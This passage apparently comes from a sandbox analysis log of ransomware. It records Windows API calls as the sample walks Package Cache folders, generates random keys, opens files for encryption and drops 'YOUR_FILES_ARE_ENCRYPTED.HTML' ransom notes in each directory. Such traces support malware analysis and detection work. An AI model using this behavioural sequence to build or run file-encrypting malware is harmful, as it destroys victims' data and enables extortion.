Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 82 [0158.498] GetProcessHeap () returned 0x270000 [0158.498] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0158.500] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0158.500] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*" [0158.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.501] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf993abb0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.502] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0158.502] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned 91 [0158.502] GetProcessHeap () returned 0x270000 [0158.502] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0158.503] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0158.503] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*" [0158.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0158.503] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.503] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0158.503] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned 112 [0158.503] GetProcessHeap () returned 0x270000 [0158.503] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.505] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0158.506] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*" [0158.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0158.506] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.506] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf833b400, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xf833b400, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xf833b400, ftLastWriteTime.dwHighDateTime=0x1ced524, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0158.506] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0158.506] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.506] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.506] lstrlenW (lpString=".cab") returned 4 [0158.506] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.506] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0158.506] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0158.507] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=821681) returned 1 [0158.507] GetProcessHeap () returned 0x270000 [0158.507] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73f0050 [0158.512] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D1") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="13") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="58") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="EA") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="80") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="85") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="24") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="D3") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="D6") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="00") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="8A") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="62") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="E8") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="73") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="9B") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="52") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="9E") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="74") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="AC") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="1D") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="85") returned 2 [0158.512] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="57") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="AD") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="9C") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="7D") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="DB") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="18") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="37") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="BF") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="6C") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="7D") returned 2 [0158.513] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="65") returned 2 [0158.514] lstrcpyW (in: lpString1=0x7400104, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0158.514] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73f0050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0158.514] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73f0050, lpOverlapped=0x73f0050) returned 1 [0158.519] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0158.519] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0158.519] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.519] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.519] lstrlenW (lpString=".msi") returned 4 [0158.519] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.519] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0158.519] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0158.519] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0158.519] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0158.628] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0158.630] CloseHandle (hObject=0x4a8) returned 1 [0158.631] GetProcessHeap () returned 0x270000 [0158.632] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.632] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0158.632] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0158.632] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0158.632] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0158.633] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0158.635] CloseHandle (hObject=0x598) returned 1 [0158.636] GetProcessHeap () returned 0x270000 [0158.637] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0158.637] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf9986e70, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf9986e70, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0158.637] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.637] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0158.637] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.638] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.641] CloseHandle (hObject=0x58c) returned 1 [0158.641] GetProcessHeap () returned 0x270000 [0158.642] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0158.642] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x1780ae70, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x1780ae70, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0158.642] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 71 [0158.642] GetProcessHeap () returned 0x270000 [0158.642] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0158.642] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0158.642] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*" [0158.642] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x1780ae70, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x1780ae70, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.643] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x1780ae70, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x1780ae70, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.643] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1780ae70, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x1780ae70, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x1aaa01f0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0158.643] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0158.643] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.643] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.643] lstrlenW (lpString=".rsm") returned 4 [0158.643] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.643] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17798a50, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0xfc922670, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0158.643] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0158.643] lstrcmpW (lpString1="vcredist_x86.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.643] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0158.643] lstrlenW (lpString=".exe") returned 4 [0158.643] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0158.644] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17798a50, 